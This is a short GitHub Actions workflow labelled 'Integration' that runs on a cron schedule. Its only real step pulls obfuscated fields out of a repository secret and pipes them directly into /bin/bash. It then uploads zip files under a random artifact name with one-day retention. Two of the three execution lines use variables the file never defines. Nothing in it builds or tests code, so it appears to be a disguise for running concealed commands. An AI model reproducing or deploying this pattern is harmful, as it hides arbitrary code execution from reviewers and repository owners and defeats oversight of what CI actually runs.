name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '43 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          q77241: ${{ secrets.q77241 }}
        run: |
          printf '%s' "$q77241" | jq -r .lmc0 | /bin/bash
          printf '%s' "$jukai932" | jq -r .pmhrw6 | /bin/bash
          printf '%s' "$lbkl7003" | jq -r .wajka361 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: DngExxZC
          path: "*.zip"
          retention-days: 1
